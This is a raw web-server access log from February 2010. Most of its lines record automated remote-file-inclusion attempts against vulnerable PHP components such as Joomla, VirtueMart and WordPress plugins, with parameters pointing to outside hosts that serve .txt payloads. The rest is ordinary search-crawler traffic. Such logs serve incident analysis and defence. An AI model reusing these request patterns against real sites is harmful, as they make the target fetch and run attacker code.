77.221.130.15 - - [13/Feb/2010:04:42:02 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:04:42:02 -0800] "GET /logs/access_100117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:04:42:26 -0800] "GET /logs/access_100201.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [13/Feb/2010:04:42:52 -0800] "GET /logs/access_100125.log/errors.php?error=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [13/Feb/2010:04:44:14 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.puaga.com"
213.239.230.130 - - [13/Feb/2010:04:44:14 -0800] "GET //write_comment_update.php?board_skin_path=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.puaga.com"
79.99.44.89 - - [13/Feb/2010:04:44:55 -0800] "GET /logs/access_100107.log/errors.php?error=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [13/Feb/2010:04:45:16 -0800] "GET /logs/access_100206.log HTTP/1.0" 200 2163814 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
122.199.140.158 - - [13/Feb/2010:04:45:35 -0800] "GET /logs/access.log/components/com_forum/download.php?phpbb_root_path=http://www.fbcoronado.com/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [13/Feb/2010:04:45:35 -0800] "GET /logs/access_100201.log/components/com_forum/download.php?phpbb_root_path=http://www.fbcoronado.com/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [13/Feb/2010:04:47:29 -0800] "GET /logs/access_100126.log HTTP/1.0" 200 1337654 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:04:47:30 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:04:47:30 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:04:47:30 -0800] "GET /logs/access_100117.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:04:47:30 -0800] "GET /logs/access_100117.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:04:47:30 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:04:47:30 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [13/Feb/2010:04:47:39 -0800] "GET /logs/access_100112.log%20%20///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [13/Feb/2010:04:47:39 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [13/Feb/2010:04:47:40 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [13/Feb/2010:04:47:41 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [13/Feb/2010:04:47:41 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [13/Feb/2010:04:47:41 -0800] "GET /logs/access_100112.log%20%20///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:04:47:47 -0800] "GET /logs/access_100117.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:04:47:47 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:04:47:47 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [13/Feb/2010:04:47:47 -0800] "GET /logs/access_100112.log%20%20///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [13/Feb/2010:04:47:47 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [13/Feb/2010:04:47:48 -0800] "GET /logs/access_100103.log%20%20///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [13/Feb/2010:04:47:48 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [13/Feb/2010:04:47:48 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mpc.ac.kr//data/list/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [13/Feb/2010:04:47:49 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mpc.ac.kr//data/list/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [13/Feb/2010:04:47:50 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mpc.ac.kr//data/list/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [13/Feb/2010:04:47:52 -0800] "GET /logs/access_100103.log%20%20///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [13/Feb/2010:04:47:55 -0800] "GET /logs/access_100103.log%20%20///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:04:48:20 -0800] "GET /logs/access_100201.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:04:48:23 -0800] "GET /logs/access_100201.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [13/Feb/2010:04:48:24 -0800] "GET /logs/access_100106.log HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [13/Feb/2010:04:48:27 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://www.puaga.com/logs/access_100106.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:04:48:27 -0800] "GET /logs/access_100201.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.80.214.147 - - [13/Feb/2010:04:48:47 -0800] "GET /logs/access_100202.log//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.80.214.147 - - [13/Feb/2010:04:48:47 -0800] "GET /logs/access_100129.log//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.80.214.147 - - [13/Feb/2010:04:48:47 -0800] "GET /bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.80.214.147 - - [13/Feb/2010:04:48:47 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:04:48:56 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [13/Feb/2010:04:48:56 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mpc.ac.kr//data/list/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [13/Feb/2010:04:48:56 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mpc.ac.kr//data/list/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [13/Feb/2010:04:48:56 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mpc.ac.kr//data/list/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [13/Feb/2010:04:48:58 -0800] "GET /logs/access_100128.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mpc.ac.kr//data/list/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:04:49:02 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:04:49:02 -0800] "GET /logs/access_100117.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [13/Feb/2010:04:49:22 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mpc.ac.kr//data/list/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [13/Feb/2010:04:49:22 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mpc.ac.kr//data/list/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [13/Feb/2010:04:49:26 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mpc.ac.kr//data/list/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [13/Feb/2010:04:50:01 -0800] "GET /logs/access_100128.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mpc.ac.kr//data/list/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:04:50:11 -0800] "GET /logs/access_100201.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.250.255.242 - - [13/Feb/2010:04:50:21 -0800] "GET /logs/access_100106.log HTTP/1.1" 404 5258 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
222.122.197.10 - - [13/Feb/2010:04:50:25 -0800] "GET /logs/access_100128.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mpc.ac.kr//data/list/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.167.62.166 - - [13/Feb/2010:04:51:38 -0800] "GET /new/ HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "www.puaga.com"
83.167.62.166 - - [13/Feb/2010:04:51:40 -0800] "GET /ideal/?S=A HTTP/1.1" 200 524 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "puaga.com"
83.167.62.166 - - [13/Feb/2010:04:51:42 -0800] "GET /ideal/?M=A HTTP/1.1" 200 524 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "puaga.com"
83.167.62.166 - - [13/Feb/2010:04:51:44 -0800] "GET /ideal/?D=A HTTP/1.1" 200 524 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "puaga.com"
83.167.62.166 - - [13/Feb/2010:04:51:46 -0800] "GET /blog HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "www.puaga.com"
83.167.62.166 - - [13/Feb/2010:04:51:50 -0800] "GET /robots.txt HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "simple.puaga.com"
83.167.62.166 - - [13/Feb/2010:04:51:51 -0800] "GET / HTTP/1.1" 302 5 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "simple.puaga.com"
83.167.62.166 - - [13/Feb/2010:04:51:52 -0800] "GET /new/ HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "puaga.com"
83.167.62.166 - - [13/Feb/2010:04:51:57 -0800] "GET /blog/ HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "puaga.com"
200.93.147.154 - - [13/Feb/2010:04:55:11 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.61.181.34 - - [13/Feb/2010:04:56:13 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [13/Feb/2010:04:56:16 -0800] "GET /ideal/forum/viewtopic.php?p=18542 HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:04:56:41 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:04:56:41 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:04:56:41 -0800] "GET /logs/access_100104.log%20%20//init_basic.php?GALLERY_BASEDIR=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:04:56:55 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:04:57:03 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:04:57:47 -0800] "GET /logs/access_100117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:04:58:30 -0800] "GET /logs/access_100201.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [13/Feb/2010:05:00:07 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [13/Feb/2010:05:00:07 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [13/Feb/2010:05:00:07 -0800] "GET /logs/access_100112.log%20%20/e404.php?DOCUMENT_ROOT=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [13/Feb/2010:05:00:08 -0800] "GET /logs/access_100112.log%20%20/e404.php?DOCUMENT_ROOT=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [13/Feb/2010:05:00:08 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [13/Feb/2010:05:00:10 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.124.127.77 - - [13/Feb/2010:05:00:20 -0800] "GET //spaw_control.class.php?spaw_root=http://www.transchool.com/n/data/session/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.124.127.77 - - [13/Feb/2010:05:00:20 -0800] "GET /logs/access_100118.log%20%20///spaw_control.class.php?spaw_root=http://www.transchool.com/n/data/session/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.124.127.77 - - [13/Feb/2010:05:00:20 -0800] "GET /logs///spaw_control.class.php?spaw_root=http://www.transchool.com/n/data/session/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [13/Feb/2010:05:00:24 -0800] "GET /logs/access_100103.log%20%20/e404.php?DOCUMENT_ROOT=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [13/Feb/2010:05:00:27 -0800] "GET /logs/access_100103.log%20%20/e404.php?DOCUMENT_ROOT=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:05:00:54 -0800] "GET /logs/access_100117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:05:01:03 -0800] "GET /logs/access_100117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:05:01:24 -0800] "GET /logs/access_100117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:05:01:28 -0800] "GET /logs/access_100201.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:05:01:45 -0800] "GET /logs/access_100201.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:05:01:47 -0800] "GET /logs/access_100201.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:05:02:53 -0800] "GET /editsite.php?returnpath=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:05:02:53 -0800] "GET /logs/access_100109.log/editsite.php?returnpath=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:05:02:53 -0800] "GET /logs/editsite.php?returnpath=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.179.6 - - [13/Feb/2010:05:03:02 -0800] "GET /logs/access_100112.log%20%20//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.179.6 - - [13/Feb/2010:05:03:02 -0800] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.179.6 - - [13/Feb/2010:05:03:02 -0800] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.179.6 - - [13/Feb/2010:05:03:05 -0800] "GET /logs/access_100104.log%20%20//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.61.181.34 - - [13/Feb/2010:05:05:27 -0800] "GET /logs/access_100119.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:05:08:21 -0800] "GET /logs/access_100204.log//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:05:08:21 -0800] "GET /logs//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:05:08:21 -0800] "GET /errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:05:08:21 -0800] "GET /logs/access_100103.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [13/Feb/2010:05:09:02 -0800] "GET /component/page,shop.product_details/flypage,flypage.tpl/product_id,6/category_id,2/option,com_virtuemart//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:09:14 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:09:23 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:09:23 -0800] "GET /logs/access_100127.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:05:09:28 -0800] "GET /logs/access_100121.log//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:05:09:28 -0800] "GET /logs//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:05:09:28 -0800] "GET /errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.0" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:05:09:32 -0800] "GET /logs/access_100105.log//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:05:10:08 -0800] "GET /logs/access_100117.log//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:10:37 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [13/Feb/2010:05:10:39 -0800] "GET /logs/access_100118.log%20%20//component/page,shop.product_details/flypage,flypage.tpl/product_id,6/category_id,2/option,com_virtuemart//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:10:47 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
